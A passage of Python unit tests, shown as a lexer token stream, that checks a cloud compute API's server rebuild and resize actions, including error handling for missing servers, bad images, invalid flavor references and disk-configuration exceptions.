op|':'
newline|'\n'
comment|'# run with enable_instance_password disabled to verify adminPass'
nl|'\n'
comment|'# is missing from response. See lp bug 921814'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'enable_instance_password'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"adminPass"'
op|':'
string|'"asdf"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'image'"
op|']'
op|'['
string|"'id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|"'adminPass'"
op|','
name|'body'
op|'['
string|"'server'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_server_not_found
dedent|''
name|'def'
name|'test_rebuild_server_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|server_not_found
indent|' '
name|'def'
name|'server_not_found'
op|'('
name|'self'
op|','
name|'instance_id'
op|','
nl|'\n'
name|'columns_to_join'
op|'='
name|'None'
op|','
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceNotFound'
op|'('
name|'instance_id'
op|'='
name|'instance_id'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'server_not_found'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_with_bad_image
dedent|''
name|'def'
name|'test_rebuild_with_bad_image'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
string|'"foo"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accessIP
dedent|''
name|'def'
name|'test_rebuild_accessIP'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'attributes'
op|'='
op|'{'
nl|'\n'
string|"'access_ip_v4'"
op|':'
string|"'172.19.0.1'"
op|','
nl|'\n'
string|"'access_ip_v6'"
op|':'
string|"'fe80::1'"
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"accessIPv4"'
op|':'
string|'"172.19.0.1"'
op|','
nl|'\n'
string|'"accessIPv6"'
op|':'
string|'"fe80::1"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'data'
op|'='
op|'{'
string|"'changes'"
op|':'
op|'{'
op|'}'
op|'}'
newline|'\n'
name|'orig_get'
op|'='
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'get'
newline|'\n'
nl|'\n'
DECL|function|wrap_get
name|'def'
name|'wrap_get'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'data'
op|'['
string|"'instance'"
op|']'
op|'='
name|'orig_get'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
newline|'\n'
name|'return'
name|'data'
op|'['
string|"'instance'"
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_save
dedent|''
name|'def'
name|'fake_save'
op|'('
name|'context'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'data'
op|'['
string|"'changes'"
op|']'
op|'.'
name|'update'
op|'('
name|'data'
op|'['
string|"'instance'"
op|']'
op|'.'
name|'obj_get_changes'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'get'"
op|','
name|'wrap_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'objects'
op|'.'
name|'Instance'
op|','
string|"'save'"
op|','
name|'fake_save'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'_image_href'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'image_ref'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'""'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'kernel_id'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'""'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'ramdisk_id'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'task_states'
op|'.'
name|'REBUILDING'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'task_state'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'progress'"
op|']'
op|')'
newline|'\n'
name|'for'
name|'attr'
op|','
name|'value'
name|'in'
name|'attributes'
op|'.'
name|'items'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'value'
op|','
name|'str'
op|'('
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
name|'attr'
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_when_kernel_not_exists
dedent|''
dedent|''
name|'def'
name|'test_rebuild_when_kernel_not_exists'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|return_image_meta
indent|' '
name|'def'
name|'return_image_meta'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image_meta_table'
op|'='
op|'{'
nl|'\n'
string|"'2'"
op|':'
op|'{'
string|"'id'"
op|':'
number|'2'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'ari'"
op|'}'
op|','
nl|'\n'
string|"'155d900f-4e14-4e4c-a73d-069cbf4541e6'"
op|':'
nl|'\n'
op|'{'
string|"'id'"
op|':'
number|'3'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'raw'"
op|','
nl|'\n'
string|"'properties'"
op|':'
op|'{'
string|"'kernel_id'"
op|':'
number|'1'
op|','
string|"'ramdisk_id'"
op|':'
number|'2'
op|'}'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'image_id'
op|'='
name|'args'
op|'['
number|'2'
op|']'
newline|'\n'
name|'try'
op|':'
newline|'\n'
indent|' '
name|'image_meta'
op|'='
name|'image_meta_table'
op|'['
name|'str'
op|'('
name|'image_id'
op|')'
op|']'
newline|'\n'
dedent|''
name|'except'
name|'KeyError'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'ImageNotFound'
op|'('
name|'image_id'
op|'='
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'image_meta'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'fake'
op|'.'
name|'_FakeImageService'
op|','
string|"'show'"
op|','
name|'return_image_meta'
op|')'
newline|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
string|'"155d900f-4e14-4e4c-a73d-069cbf4541e6"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_proper_kernel_ram
dedent|''
name|'def'
name|'test_rebuild_proper_kernel_ram'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance_meta'
op|'='
op|'{'
string|"'kernel_id'"
op|':'
name|'None'
op|','
string|"'ramdisk_id'"
op|':'
name|'None'
op|'}'
newline|'\n'
nl|'\n'
name|'orig_get'
op|'='
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'get'
newline|'\n'
nl|'\n'
DECL|function|wrap_get
name|'def'
name|'wrap_get'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst'
op|'='
name|'orig_get'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
newline|'\n'
name|'instance_meta'
op|'['
string|"'instance'"
op|']'
op|'='
name|'inst'
newline|'\n'
name|'return'
name|'inst'
newline|'\n'
nl|'\n'
DECL|function|fake_save
dedent|''
name|'def'
name|'fake_save'
op|'('
name|'context'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'instance_meta'
op|'['
string|"'instance'"
op|']'
newline|'\n'
name|'for'
name|'key'
name|'in'
name|'instance_meta'
op|'.'
name|'keys'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'key'
name|'in'
name|'instance'
op|'.'
name|'obj_what_changed'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance_meta'
op|'['
name|'key'
op|']'
op|'='
name|'instance'
op|'['
name|'key'
op|']'
newline|'\n'
nl|'\n'
DECL|function|return_image_meta
dedent|''
dedent|''
dedent|''
name|'def'
name|'return_image_meta'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image_meta_table'
op|'='
op|'{'
nl|'\n'
string|"'1'"
op|':'
op|'{'
string|"'id'"
op|':'
number|'1'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'aki'"
op|'}'
op|','
nl|'\n'
string|"'2'"
op|':'
op|'{'
string|"'id'"
op|':'
number|'2'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'ari'"
op|'}'
op|','
nl|'\n'
string|"'155d900f-4e14-4e4c-a73d-069cbf4541e6'"
op|':'
nl|'\n'
op|'{'
string|"'id'"
op|':'
number|'3'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'raw'"
op|','
nl|'\n'
string|"'properties'"
op|':'
op|'{'
string|"'kernel_id'"
op|':'
number|'1'
op|','
string|"'ramdisk_id'"
op|':'
number|'2'
op|'}'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'image_id'
op|'='
name|'args'
op|'['
number|'2'
op|']'
newline|'\n'
name|'try'
op|':'
newline|'\n'
indent|' '
name|'image_meta'
op|'='
name|'image_meta_table'
op|'['
name|'str'
op|'('
name|'image_id'
op|')'
op|']'
newline|'\n'
dedent|''
name|'except'
name|'KeyError'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'ImageNotFound'
op|'('
name|'image_id'
op|'='
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'image_meta'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'fake'
op|'.'
name|'_FakeImageService'
op|','
string|"'show'"
op|','
name|'return_image_meta'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'get'"
op|','
name|'wrap_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'objects'
op|'.'
name|'Instance'
op|','
string|"'save'"
op|','
name|'fake_save'
op|')'
newline|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
string|'"155d900f-4e14-4e4c-a73d-069cbf4541e6"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
op|'.'
name|'obj'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'instance_meta'
op|'['
string|"'kernel_id'"
op|']'
op|','
string|"'1'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'instance_meta'
op|'['
string|"'ramdisk_id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|')'
newline|'\n'
DECL|member|test_rebuild_instance_raise_auto_disk_config_exc
name|'def'
name|'test_rebuild_instance_raise_auto_disk_config_exc'
op|'('
name|'self'
op|','
name|'mock_rebuild'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'mock_rebuild'
op|'.'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'AutoDiskConfigDisabledByImage'
op|'('
nl|'\n'
name|'image'
op|'='
string|"'dummy'"
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server
dedent|''
name|'def'
name|'test_resize_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'resize_called'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|function|resize_mock
name|'def'
name|'resize_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'resize_called'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'resize'"
op|','
name|'resize_mock'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'resize_called'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server_no_flavor
dedent|''
name|'def'
name|'test_resize_server_no_flavor'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server_no_flavor_ref
dedent|''
name|'def'
name|'test_resize_server_no_flavor_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
name|'None'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server_with_extra_arg
dedent|''
name|'def'
name|'test_resize_server_with_extra_arg'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'favorRef'
op|'='
string|'"http://localhost/3"'
op|','
nl|'\n'
name|'extra_arg'
op|'='
string|'"extra_arg"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server_invalid_flavor_ref
dedent|''
name|'def'
name|'test_resize_server_invalid_flavor_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
number|'1.2'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_with_server_not_found
dedent|''
name|'def'
name|'test_resize_with_server_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'get'"
op|','
name|'return_server_not_found'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_with_image_exceptions
dedent|''
name|'def'
name|'test_resize_with_image_exceptions'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'resize_called'
op|'='
number|'0'
newline|'\n'
name|'image_id'
op|'='
string|"'fake_image_id'"
newline|'\n'
nl|'\n'
name|'exceptions'
op|'='
op|'['
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'ImageNotAuthorized'
op|'('
name|'image_id'
op|'='
name|'image_id'
op|')'
op|','
nl|'\n'
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPUnauthorized'
op|')'
op|','
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'ImageNotFound'
op|'('
name|'image_id'
op|'='
name|'image_id'
op|')'
op|','
nl|'\n'
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|')'
op|','
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'Invalid'
op|','
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|')'
op|','
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'NoValidHost'
op|'('
name|'reason'
op|'='
string|"'Bad host'"
op|')'
op|','
nl|'\n'
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|')'
op|','
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'AutoDiskConfigDisabledByImage'
op|'('
name|'image'
op|'='
name|'image_id'
op|')'
op|','
nl|'\n'
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|')'
op|','
nl|'\n'
op|']'
newline|'\n'
nl|'\n'
name|'raised'
op|','
name|'expected'
op|'='
name|'map'
op|'('
name|'iter'
op|','
name|'zip'
op|'('
op|'*'
name|'exceptions'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|_fake_resize
name|'def'
name|'_fake_resize'
op|'('
name|'obj'
op|','
name|'context'
op|','
name|'instance'
op|','
name|'flavor_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'resize_called'
op|'+='
number|'1'
newline|'\n'
name|'raise'
name|'next'
op|'('
name|'raised'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'resize'"
op|','
name|'_fake_resize'
op|')'
newline|'\n'
nl|'\n'
name|'for'
name|'call_no'
name|'in'
name|'range'
op|'('
name|'len'
op|'('
name|'exceptions'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'next_exception'
op|'='
name|'next'
op|'('
name|'expected'
op|')'
newline|'\n'
name|'actual'
op|'='
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'next_exception'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'if'
op|'('
name|'isinstance'
op|'('
name|'exceptions'
op|'['
name|'call_no'
op|']'
op|'['
number|'0'
op|']'
op|','
nl|'\n'
name|'exception'
op|'.'
name|'NoValidHost'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'actual'
op|'.'
name|'explanation'
op|','
nl|'\n'
string|"'No valid host was found. Bad host'"
op|')'
newline|'\n'
dedent|''
name|'elif'
op|'('
name|'isinstance'
op|'('
name|'exceptions'
op|'['
name|'call_no'
op|']'
op|'['
number|'0'
op|']'
op|','
nl|'\n'
name|'exception'
op|'.'
name|'AutoDiskConfigDisabledByImage'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'actual'
op|'.'
name|'explanation'
op|','
nl|'\n'
string|"'Requested image fake_image_id has automatic'"
nl|'\n'
string|"' disk resize disabled.'"
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'resize_called'
op|','
name|'call_no'
op|'+'
number|'1'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.compute.api.API.resize'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'CannotResizeDisk'
op|'('
name|'reason'
op|'='
string|"''"
op|')'
op|')'
newline|'\n'
DECL|member|test_resize_raises_cannot_resize_disk
name|'def'
name|'test_resize_raises_cannot_resize_disk'
op|'('
name|'self'
op|','
name|'mock_resize'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.compute.api.API.resize'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'FlavorNotFound'
op|'('
name|'reason'
op|'='
string|"''"
op|','
nl|'\n'
name|'flavor_id'
op|'='
string|"'fake_id'"
op|')'
op|')'
newline|'\n'
DECL|member|test_resize_raises_flavor_not_found
name|'def'
name|'test_resize_raises_flavor_not_found'
op|'('
name|'self'
op|','
name|'mock_resize'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_with_too_many_instances
dedent|''
name|'def'
name|'test_resize_with_too_many_instances'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_resize
name|'def'
name|'fake_resize'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'TooManyInstances'
op|'('
name|'message'
op|'='
string|'"TooManyInstance"'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
